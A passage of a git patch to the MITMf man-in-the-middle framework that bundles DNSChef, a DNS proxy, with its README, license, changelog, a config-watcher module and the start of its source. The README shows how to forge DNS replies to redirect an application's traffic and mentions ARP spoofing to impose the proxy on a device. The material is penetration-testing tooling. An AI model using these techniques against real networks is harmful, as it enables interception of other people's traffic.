From 663f38e732ee1681b226d48fddec922cb6b3d1c3 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Sun, 19 Apr 2015 23:32:52 +0200 Subject: [PATCH 01/20] initial dynamic config support added configwatcher.py --- .gitmodules | 3 - README.md | 12 +- config/mitmf.conf | 2 +- core/configwatcher.py | 49 +++ core/dnschef/CHANGELOG | 29 ++ core/dnschef/LICENSE | 25 ++ core/dnschef/README.md | 339 +++++++++++++++ core/dnschef/__init__.py | 0 core/dnschef/dnschef.py | 502 +++++++++++++++++++++++ core/sslstrip/ClientRequest.py | 20 +- core/sslstrip/SSLServerConnection.py | 12 +- core/sslstrip/ServerConnection.py | 10 +- core/sslstrip/ServerConnectionFactory.py | 4 +- core/sslstrip/URLMonitor.py | 75 ++-- core/utils.py | 106 +++-- libs/dnschef | 1 - mitmf.py | 66 +-- plugins/AppCachePoison.py | 9 +- plugins/BeefAutorun.py | 106 +++-- plugins/BrowserProfiler.py | 2 +- plugins/FilePwn.py | 78 ++-- plugins/Inject.py | 9 +- plugins/SSLstrip+.py | 2 +- plugins/Spoof.py | 2 +- plugins/plugin.py | 4 - requirements.txt | 1 + 26 files changed, 1187 insertions(+), 281 deletions(-) create mode 100644 core/configwatcher.py create mode 100644 core/dnschef/CHANGELOG create mode 100644 core/dnschef/LICENSE create mode 100644 core/dnschef/README.md create mode 100644 core/dnschef/__init__.py create mode 100755 core/dnschef/dnschef.py delete mode 160000 libs/dnschef diff --git a/.gitmodules b/.gitmodules index ca49b01..fbdd874 100644 --- a/.gitmodules +++ b/.gitmodules @@ -7,6 +7,3 @@ [submodule "core/beefapi"] path = core/beefapi url = https://github.com/byt3bl33d3r/beefapi -[submodule "libs/dnschef"] - path = libs/dnschef - url = https://github.com/byt3bl33d3r/dnschef diff --git a/README.md b/README.md index 109f42d..3334510 100644 --- a/README.md +++ b/README.md @@ -13,6 +13,13 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox ============================ As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required. +How to install on Kali +====================== + +```apt-get install mitmf``` + +**Currently Kali has a very old version of MITMf in it's repos, please read the [Installation](#installation) section to get the latest version** + Installation ============ If MITMf is not in your distros repo or you just want the latest version: @@ -79,8 +86,3 @@ If you find a *bug* please open an issue and include at least the following in t - OS your using Also remember: Github markdown is your friend! - -How to install on Kali -====================== - -```apt-get install mitmf``` diff --git a/config/mitmf.conf b/config/mitmf.conf index f1f5b32..58d82e5 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -40,7 +40,7 @@ nameservers = 8.8.8.8 [[[A]]] # Queries for IPv4 address records - *.thesprawl.org=192.0.2.1 + *.thesprawls.org=192.0.2.1 [[[AAAA]]] # Queries for IPv6 address records *.thesprawl.org=2001:db8::1 diff --git a/core/configwatcher.py b/core/configwatcher.py new file mode 100644 index 0000000..0a2e570 --- /dev/null +++ b/core/configwatcher.py @@ -0,0 +1,49 @@ +#! 
/usr/bin/env python2.7 + +import logging + +logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages +from watchdog.observers import Observer +from watchdog.events import FileSystemEventHandler + +from configobj import ConfigObj + +mitmf_logger = logging.getLogger('mitmf') + +class ConfigWatcher(FileSystemEventHandler): + + _instance = None + + def __init__(self): + + self.config = ConfigObj("./config/mitmf.conf") + + @staticmethod + def getInstance(): + if ConfigWatcher._instance is None: + ConfigWatcher._instance = ConfigWatcher() + + return ConfigWatcher._instance + + def startConfigWatch(self): + observer = Observer() + observer.schedule(self, path='./config', recursive=False) + observer.start() + + def getConfig(self): + return self.config + + def on_modified(self, event): + mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__)) + self.reloadConfig() + self.onConfigChange() + + def onConfigChange(self): + """ We can subclass this function to do stuff after the config file has been modified""" + pass + + def reloadConfig(self): + try: + self.config = ConfigObj("./config/mitmf.conf") + except Exception, e: + mitmf_logger.warning("Error reloading config file: {}".format(e)) diff --git a/core/dnschef/CHANGELOG b/core/dnschef/CHANGELOG new file mode 100644 index 0000000..727a7d7 --- /dev/null +++ b/core/dnschef/CHANGELOG @@ -0,0 +1,29 @@ +Version 0.3 + +* Added support for the latest version of the dnslib library - 0.9.3 +* Added support for logging. (idea by kafeine) +* Added support for SRV, DNSKEY, and RRSIG records. (idea by mubix) +* Added support for TCP remote nameserver connections. (idea by mubix) +* DNS name matching is now case insensitive. +* Various small bug fixes and performance tweaks. +* Python libraries are no longer bundled with the distribution, but + compiled in the Windows binary. + +Version 0.2.1 + +* Fixed a Python 2.6 compatibility issue. (thanks Mehran Goudarzi) + +Version 0.2 + +* Added IPv6 support. +* Added AAAA, MX, CNAME, NS, SOA and NAPTR support. +* Added support for ANY queries (returns all known fake records). +* Changed file format to support more DNS record types. +* Added alternative DNS port support (contributed by fnv). +* Added alternative listening port support for the server (contributed by Mark Straver). +* Updated bundled dnslib library to the latest version - 0.8.2. +* Included IPy library for IPv6 support. + +Version 0.1 + +* First public release diff --git a/core/dnschef/LICENSE b/core/dnschef/LICENSE new file mode 100644 index 0000000..b826757 --- /dev/null +++ b/core/dnschef/LICENSE @@ -0,0 +1,25 @@ +Copyright (C) 2014 Peter Kacherginsky +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +3. Neither the name of the copyright holder nor the names of its contributors + may be used to endorse or promote products derived from this software without + specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/core/dnschef/README.md b/core/dnschef/README.md new file mode 100644 index 0000000..589a274 --- /dev/null +++ b/core/dnschef/README.md @@ -0,0 +1,339 @@ +DNSChef +======= + +The latest version of this document can be obtained from http://thesprawl.org/projects/dnschef/ + +DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet. + +There are several DNS Proxies out there. Most will simply point all DNS queries a single IP address or implement only rudimentary filtering. DNSChef was developed as part of a penetration test where there was a need for a more configurable system. As a result, DNSChef is cross-platform application capable of forging responses based on inclusive and exclusive domain lists, supporting multiple DNS record types, matching domains with wildcards, proxying true responses for nonmatching domains, defining external configuration files, IPv6 and many other features. You can find detailed explanation of each of the features and suggested uses below. + +The use of DNS Proxy is recommended in situations where it is not possible to force an application to use some other proxy server directly. For example, some mobile applications completely ignore OS HTTP Proxy settings. In these cases, the use of a DNS proxy server such as DNSChef will allow you to trick that application into forwarding connections to the desired destination. + +Setting up a DNS Proxy +====================== + +Before you can start using DNSChef, you must configure your machine to use a DNS nameserver with the tool running on it. You have several options based on the operating system you are going to use: + +* **Linux** - Edit */etc/resolv.conf* to include a line on the very top with your traffic analysis host (e.g add "nameserver 127.0.0.1" if you are running locally). Alternatively, you can add a DNS server address using tools such as Network Manager. Inside the Network Manager open IPv4 Settings, select *Automatic (DHCP) addresses only* or *Manual* from the *Method* drop down box and edit *DNS Servers* text box to include an IP address with DNSChef running. + +* **Windows** - Select *Network Connections* from the *Control Panel*. Next select one of the connections (e.g. "Local Area Connection"), right-click on it and select properties. From within a newly appearing dialog box, select *Internet Protocol (TCP/IP)* and click on properties. 
Finally, select the *Use the following DNS server addresses* radio button and enter the IP address of the host running DNSChef. For example, if running locally enter 127.0.0.1.
+
+* **OS X** - Open *System Preferences* and click on the *Network* icon. Select the active interface and fill in the *DNS Server* field. If you are using Airport then you will have to click on the *Advanced...* button and edit DNS servers from there. Alternatively, you can edit */etc/resolv.conf* and add a fake nameserver to the very top there (e.g. "nameserver 127.0.0.1").
+
+* **iOS** - Open *Settings* and select *General*. Next select *Wi-Fi* and click on the blue arrow to the right of an active Access Point from the list. Edit the DNS entry to point to the host running DNSChef. Make sure you have disabled the Cellular interface (if available).
+
+* **Android** - Open *Settings* and select *Wireless and network*. Click on *Wi-Fi settings* and select *Advanced* after pressing the *Options* button on the phone. Enable the *Use static IP* checkbox and configure a custom DNS server.
+
+If you do not have the ability to modify the device's DNS settings manually, you still have several options involving techniques such as [ARP Spoofing](http://en.wikipedia.org/wiki/ARP_spoofing), [Rogue DHCP](http://www.yersinia.net/doc.htm) and other creative methods.
+
+Finally, you need to configure a fake service to which DNSChef will point all of the requests. For example, if you are trying to intercept web traffic, you must bring up either a separate web server running on port 80 or set up a web proxy (e.g. Burp) to intercept traffic. DNSChef will point queries to your proxy/server host with properly configured services.
+
+Running DNSChef
+===============
+
+DNSChef is a cross-platform application developed in Python which should run on most platforms that have a Python interpreter. You can use the supplied *dnschef.exe* executable to run it on Windows hosts without installing a Python interpreter. This guide will concentrate on Unix environments; however, all of the examples below were tested to work on Windows as well.
+
+Let's get a taste of DNSChef with its most basic monitoring functionality. Execute the following command as root (required to start a server on port 53):
+
+    # ./dnschef.py
+
+      _ _ __
+      | | version 0.2 | | / _|
+      __| |_ __ ___ ___| |__ ___| |_
+      / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+      | (_| | | | \__ \ (__| | | | __/ |
+      \__,_|_| |_|___/\___|_| |_|\___|_|
+      iphelix@thesprawl.org
+
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] No parameters were specified. Running in full proxy mode
+
+Without any parameters, DNSChef will run in full proxy mode. This means that all requests will simply be forwarded to an upstream DNS server (8.8.8.8 by default) and returned to the querying host. For example, let's query an "A" record for a domain and observe the results:
+
+    $ host -t A thesprawl.org
+    thesprawl.org has address 108.59.3.64
+
+DNSChef will print the following log line showing the time, source IP address, type of record requested and, most importantly, which name was queried:
+
+    [23:54:03] 127.0.0.1: proxying the response of type 'A' for thesprawl.org
+
+This mode is useful for simple application monitoring where you need to figure out which domains an application uses for its communications.
+
+DNSChef has full support for IPv6, which can be activated using the *-6* or *--ipv6* flags.
+It works exactly like the IPv4 mode, with the exception that the default listening interface is switched to ::1 and the default DNS server is switched to 2001:4860:4860::8888. Here is a sample output:
+
+    # ./dnschef.py -6
+
+      _ _ __
+      | | version 0.2 | | / _|
+      __| |_ __ ___ ___| |__ ___| |_
+      / _` | '_ \/ __|/ __| '_ \ / _ \ _|
+      | (_| | | | \__ \ (__| | | | __/ |
+      \__,_|_| |_|___/\___|_| |_|\___|_|
+      iphelix@thesprawl.org
+
+    [*] Using IPv6 mode.
+    [*] DNSChef started on interface: ::1
+    [*] Using the following nameservers: 2001:4860:4860::8888
+    [*] No parameters were specified. Running in full proxy mode
+    [00:35:44] ::1: proxying the response of type 'A' for thesprawl.org
+    [00:35:44] ::1: proxying the response of type 'AAAA' for thesprawl.org
+    [00:35:44] ::1: proxying the response of type 'MX' for thesprawl.org
+
+NOTE: By default, DNSChef creates a UDP listener. You can use TCP instead with the *--tcp* argument discussed later.
+
+Intercept all responses
+-----------------------
+
+Now that you know how to start DNSChef, let's configure it to fake all replies to point to 127.0.0.1 using the *--fakeip* parameter:
+
+    # ./dnschef.py --fakeip 127.0.0.1 -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] Cooking all A replies to point to 127.0.0.1
+    [23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+    [23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
+    [23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In the above output you can see that DNSChef was configured to point all 'A' replies to 127.0.0.1. The first log line, at 23:55:57, shows that we have "cooked" the "A" record response to point to 127.0.0.1. However, further requests for 'AAAA' and 'MX' records are simply proxied from a real DNS server. Let's see the output from the requesting program:
+
+    $ host google.com localhost
+    google.com has address 127.0.0.1
+    google.com has IPv6 address 2001:4860:4001:803::1001
+    google.com mail is handled by 10 aspmx.l.google.com.
+    google.com mail is handled by 40 alt3.aspmx.l.google.com.
+    google.com mail is handled by 30 alt2.aspmx.l.google.com.
+    google.com mail is handled by 20 alt1.aspmx.l.google.com.
+    google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+As you can see, the program was tricked into using 127.0.0.1 for the IPv4 address. However, the information obtained from the IPv6 (AAAA) and mail (MX) records appears completely legitimate. The goal of DNSChef is to have the least impact on the correct operation of the program, so if an application relies on a specific mailserver it will correctly obtain one through this proxied request.
+
+Let's fake one more record type to illustrate how to target multiple records at the same time:
+
+    # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] Cooking all A replies to point to 127.0.0.1
+    [*] Cooking all AAAA replies to point to ::1
+    [00:02:14] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+    [00:02:14] 127.0.0.1: cooking the response of type 'AAAA' for google.com to ::1
+    [00:02:14] 127.0.0.1: proxying the response of type 'MX' for google.com
+
+In addition to the *--fakeip* flag, I have now specified *--fakeipv6*, which fakes 'AAAA' record queries.
+Here is an updated program output:
+
+    $ host google.com localhost
+    google.com has address 127.0.0.1
+    google.com has IPv6 address ::1
+    google.com mail is handled by 10 aspmx.l.google.com.
+    google.com mail is handled by 40 alt3.aspmx.l.google.com.
+    google.com mail is handled by 30 alt2.aspmx.l.google.com.
+    google.com mail is handled by 20 alt1.aspmx.l.google.com.
+    google.com mail is handled by 50 alt4.aspmx.l.google.com.
+
+Once more, all of the records not explicitly overridden were proxied and returned from the real DNS server. However, the IPv4 (A) and IPv6 (AAAA) records were both faked to point to the local machine.
+
+DNSChef supports multiple record types:
+
+    +--------+--------------+-------------+--------------------------+
+    | Record | Description  | Argument    | Example                  |
+    +--------+--------------+-------------+--------------------------+
+    | A      | IPv4 address | --fakeip    | --fakeip 192.0.2.1       |
+    | AAAA   | IPv6 address | --fakeipv6  | --fakeipv6 2001:db8::1   |
+    | MX     | Mail server  | --fakemail  | --fakemail mail.fake.com |
+    | CNAME  | CNAME record | --fakealias | --fakealias www.fake.com |
+    | NS     | Name server  | --fakens    | --fakens ns.fake.com     |
+    +--------+--------------+-------------+--------------------------+
+
+NOTE: For usability, not all DNS record types are exposed on the command line. Additional records such as PTR, TXT, SOA, etc. can be specified using the --file flag and an appropriate record header. See the [external definitions file](#external-definitions-file) section below for details.
+
+Finally, let's observe how DNSChef handles queries of type ANY:
+
+    # ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] Cooking all A replies to point to 127.0.0.1
+    [*] Cooking all AAAA replies to point to ::1
+    [*] Cooking all MX replies to point to mail.fake.com
+    [*] Cooking all CNAME replies to point to www.fake.com
+    [*] Cooking all NS replies to point to ns.fake.com
+    [00:17:29] 127.0.0.1: cooking the response of type 'ANY' for google.com with all known fake records.
+
+A DNS ANY query results in DNSChef returning every faked record that it knows about for the applicable domain. Here is the output that the program will see:
+
+    $ host -t ANY google.com localhost
+    google.com has address 127.0.0.1
+    google.com has IPv6 address ::1
+    google.com mail is handled by 10 mail.fake.com.
+    google.com is an alias for www.fake.com.
+    google.com name server ns.fake.com.
+
+Filtering domains
+-----------------
+
+Building on the above example, suppose you only want to intercept requests for *thesprawl.org* and leave queries to all other domains, such as *webfaction.com*, without modification. You can use the *--fakedomains* parameter as illustrated below:
+
+    # ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] Cooking replies to point to 127.0.0.1 matching: thesprawl.org
+    [00:23:37] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 127.0.0.1
+    [00:23:52] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+
+In the above example, the request for *thesprawl.org* was faked; however, the request for *mx9.webfaction.com* was left alone. Filtering domains is very useful when you attempt to isolate a single application without breaking the rest.
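+
+If you prefer to script this kind of check instead of running *host* by hand, the same queries can be issued with the dnslib library that DNSChef already relies on. The snippet below is only a minimal sketch (it assumes DNSChef is listening on 127.0.0.1:53 and that dnslib is importable; the loop and names are illustrative and not part of DNSChef itself):
+
+    from dnslib import DNSRecord
+
+    for name in ["thesprawl.org", "mx9.webfaction.com"]:
+        # send an 'A' query to the proxy and print whatever comes back
+        reply = DNSRecord.parse(DNSRecord.question(name).send("127.0.0.1", 53))
+        for rr in reply.rr:
+            print "{} -> {}".format(name, rr.rdata)
+
+With the *--fakedomains* example above, the faked name should come back as 127.0.0.1 while the other one should show its real address.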
+
+NOTE: DNSChef will not verify whether the domain exists or not before faking the response. If you have specified a domain, it will always resolve to a fake value whether it really exists or not.
+
+Reverse filtering
+-----------------
+
+In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this task using the *--truedomains* parameter as follows:
+
+    # ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [*] Cooking replies to point to 127.0.0.1 not matching: *.webfaction.com, thesprawl.org
+    [00:27:57] 127.0.0.1: proxying the response of type 'A' for mx9.webfaction.com
+    [00:28:05] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
+
+There are several things going on in the above example. First, notice the use of a wildcard (*). All domains matching *.webfaction.com will be reverse matched and resolved to their true values. The request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
+
+NOTE: Wildcards are position-specific. A mask of type *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of type *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
+
+External definitions file
+-------------------------
+
+There may be situations where defining a single fake DNS record for all matching domains is not sufficient. You can use an external file with a collection of DOMAIN=RECORD pairs defining exactly where you want each request to go.
+
+For example, let's create the following definitions file and call it *dnschef.ini*:
+
+    [A]
+    *.google.com=192.0.2.1
+    thesprawl.org=192.0.2.2
+    *.wordpress.*=192.0.2.3
+
+Notice the section header [A]: it defines the record type for DNSChef. Now let's carefully observe the output of multiple queries:
+
+    # ./dnschef.py --file dnschef.ini -q
+    [*] DNSChef started on interface: 127.0.0.1
+    [*] Using the following nameservers: 8.8.8.8
+    [+] Cooking A replies for domain *.google.com with '192.0.2.1'
+    [+] Cooking A replies for domain thesprawl.org with '192.0.2.2'
+    [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3'
+    [00:43:54] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1
+    [00:44:05] 127.0.0.1: cooking the response of type 'A' for www.google.com to 192.0.2.1
+    [00:44:19] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 192.0.2.2
+    [00:44:29] 127.0.0.1: proxying the response of type 'A' for www.thesprawl.org
+    [00:44:40] 127.0.0.1: cooking the response of type 'A' for www.wordpress.org to 192.0.2.3
+    [00:44:51] 127.0.0.1: cooking the response of type 'A' for wordpress.com to 192.0.2.3
+    [00:45:02] 127.0.0.1: proxying the response of type 'A' for slashdot.org
+
+Both *google.com* and *www.google.com* matched the *\*.google.com* entry and correctly resolved to *192.0.2.1*. On the other hand, the *www.thesprawl.org* request was simply proxied instead of being modified. All variations of *wordpress.com*, *www.wordpress.org*, etc. matched the *\*.wordpress.\** mask and correctly resolved to *192.0.2.3*. Finally, the undefined *slashdot.org* query was simply proxied with a real response.
+
+You can specify section headers for all other supported DNS record types, including the ones not explicitly exposed on the command line: [A], [AAAA], [MX], [NS], [CNAME], [PTR], [NAPTR] and [SOA].
For example, let's define a new [PTR] section in the 'dnschef.ini' file: + + [PTR] + *.2.0.192.in-addr.arpa=fake.com + +Let's observe DNSChef's behavior with this new record type: + + ./dnschef.py --file dnschef.ini -q + [sudo] password for iphelix: + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [+] Cooking PTR replies for domain *.2.0.192.in-addr.arpa with 'fake.com' + [00:11:34] 127.0.0.1: cooking the response of type 'PTR' for 1.2.0.192.in-addr.arpa to fake.com + +And here is what a client might see when performing reverse DNS queries: + + $ host 192.0.2.1 localhost + 1.2.0.192.in-addr.arpa domain name pointer fake.com. + +Some records require exact formatting. Good examples are SOA and NAPTR + + [SOA] + *.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600 + + [NAPTR] + *.thesprawl.org=100 10 U E2U+sip !^.*$!sip:customer-service@fake.com! . + +See sample dnschef.ini file for additional examples. + +Advanced Filtering +------------------ + +You can mix and match input from a file and command line. For example the following command uses both *--file* and *--fakedomains* parameters: + + # ./dnschef.py --file dnschef.ini --fakeip 6.6.6.6 --fakedomains=thesprawl.org,slashdot.org -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [+] Cooking A replies for domain *.google.com with '192.0.2.1' + [+] Cooking A replies for domain thesprawl.org with '192.0.2.2' + [+] Cooking A replies for domain *.wordpress.* with '192.0.2.3' + [*] Cooking A replies to point to 6.6.6.6 matching: *.wordpress.*, *.google.com, thesprawl.org + [*] Cooking A replies to point to 6.6.6.6 matching: slashdot.org, *.wordpress.*, *.google.com, thesprawl.org + [00:49:05] 127.0.0.1: cooking the response of type 'A' for google.com to 192.0.2.1 + [00:49:15] 127.0.0.1: cooking the response of type 'A' for slashdot.org to 6.6.6.6 + [00:49:31] 127.0.0.1: cooking the response of type 'A' for thesprawl.org to 6.6.6.6 + [00:50:08] 127.0.0.1: proxying the response of type 'A' for tor.com + +Notice the definition for *thesprawl.org* in the command line parameter took precedence over *dnschef.ini*. This could be useful if you want to override values in the configuration file. slashdot.org still resolves to the fake IP address because it was specified in the *--fakedomains* parameter. tor.com request is simply proxied since it was not specified in either command line or the configuration file. + +Other configurations +==================== + +For security reasons, DNSChef listens on a local 127.0.0.1 (or ::1 for IPv6) interface by default. You can make DNSChef listen on another interface using the *--interface* parameter: + + # ./dnschef.py --interface 0.0.0.0 -q + [*] DNSChef started on interface: 0.0.0.0 + [*] Using the following nameservers: 8.8.8.8 + [*] No parameters were specified. Running in full proxy mode + [00:50:53] 192.0.2.105: proxying the response of type 'A' for thesprawl.org + +or for IPv6: + + # ./dnschef.py -6 --interface :: -q + [*] Using IPv6 mode. + [*] DNSChef started on interface: :: + [*] Using the following nameservers: 2001:4860:4860::8888 + [*] No parameters were specified. Running in full proxy mode + [00:57:46] 2001:db8::105: proxying the response of type 'A' for thesprawl.org + +By default, DNSChef uses Google's public DNS server to make proxy requests. 
However, you can define a custom list of nameservers using the *--nameservers* parameter: + + # ./dnschef.py --nameservers 4.2.2.1,4.2.2.2 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 4.2.2.1, 4.2.2.2 + [*] No parameters were specified. Running in full proxy mode + [00:55:08] 127.0.0.1: proxying the response of type 'A' for thesprawl.org + +It is possible to specify non-standard nameserver port using IP#PORT notation: + + # ./dnschef.py --nameservers 192.0.2.2#5353 -q + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 192.0.2.2#5353 + [*] No parameters were specified. Running in full proxy mode + [02:03:12] 127.0.0.1: proxying the response of type 'A' for thesprawl.org + +At the same time it is possible to start DNSChef itself on an alternative port using the *-p port#* parameter: + + # ./dnschef.py -p 5353 -q + [*] Listening on an alternative port 5353 + [*] DNSChef started on interface: 127.0.0.1 + [*] Using the following nameservers: 8.8.8.8 + [*] No parameters were specified. Running in full proxy mode + +DNS protocol can be used over UDP (default) or TCP. DNSChef implements a TCP mode which can be activated with the *--tcp* flag. + +Internal architecture +===================== + +Here is some information on the internals in case you need to adapt the tool for your needs. DNSChef is built on top of the SocketServer module and uses threading to help process multiple requests simultaneously. The tool is designed to listen on TCP or UDP ports (default is port 53) for incoming requests and forward those requests when necessary to a real DNS server over UDP. + +The excellent [dnslib library](https://bitbucket.org/paulc/dnslib/wiki/Home) is used to dissect and reassemble DNS packets. It is particularly useful when generating response packets based on queries. [IPy](https://github.com/haypo/python-ipy/) is used for IPv6 addresses manipulation. Both libraries come bundled with DNSChef to ease installation. + +DNSChef is capable of modifing queries for records of type "A", "AAAA", "MX", "CNAME", "NS", "TXT", "PTR", "NAPTR", "SOA", "ANY". It is very easy to expand or modify behavior for any record. Simply add another **if qtype == "RECORD TYPE")** entry and tell it what to reply with. + +Enjoy the tool and forward all requests and comments to iphelix [at] thesprawl.org. + +Happy hacking! + -Peter diff --git a/core/dnschef/__init__.py b/core/dnschef/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/dnschef/dnschef.py b/core/dnschef/dnschef.py new file mode 100755 index 0000000..971c787 --- /dev/null +++ b/core/dnschef/dnschef.py @@ -0,0 +1,502 @@ +#!/usr/bin/env python2.7 +# +# DNSChef is a highly configurable DNS Proxy for Penetration Testers +# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/ +# for the latest version and documentation. Please forward all issues and +# concerns to iphelix [at] thesprawl.org. + +# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, this +# list of conditions and the following disclaimer. +# 2. 
Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR +# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; +# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND +# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + +import threading, random, operator, time +import SocketServer, socket, sys, os +import binascii +import string +import base64 +import time +import logging + +from configobj import ConfigObj +from core.configwatcher import ConfigWatcher + +from dnslib import * +from IPy import IP + +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +dnschef_logger = logging.getLogger('dnschef') +fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log") +fileHandler.setFormatter(formatter) +dnschef_logger.addHandler(fileHandler) + +# DNSHandler Mixin. The class contains generic functions to parse DNS requests and +# calculate an appropriate response based on user parameters. +class DNSHandler(): + + def parse(self,data): + + nametodns = DNSChef.getInstance().nametodns + nameservers = DNSChef.getInstance().nameservers + hsts = DNSChef.getInstance().hsts + hstsconfig = DNSChef.getInstance().real_records + server_address = DNSChef.getInstance().server_address + + response = "" + + try: + # Parse data as DNS + d = DNSRecord.parse(data) + + except Exception, e: + dnschef_logger.info("{} ERROR: invalid DNS request".format(self.client_address[0])) + + else: + # Only Process DNS Queries + if QR[d.header.qr] == "QUERY": + + # Gather query parameters + # NOTE: Do not lowercase qname here, because we want to see + # any case request weirdness in the logs. 
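+                #       (matching in findnametodns() below is done on a lowercased copy, so the log keeps the original case)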
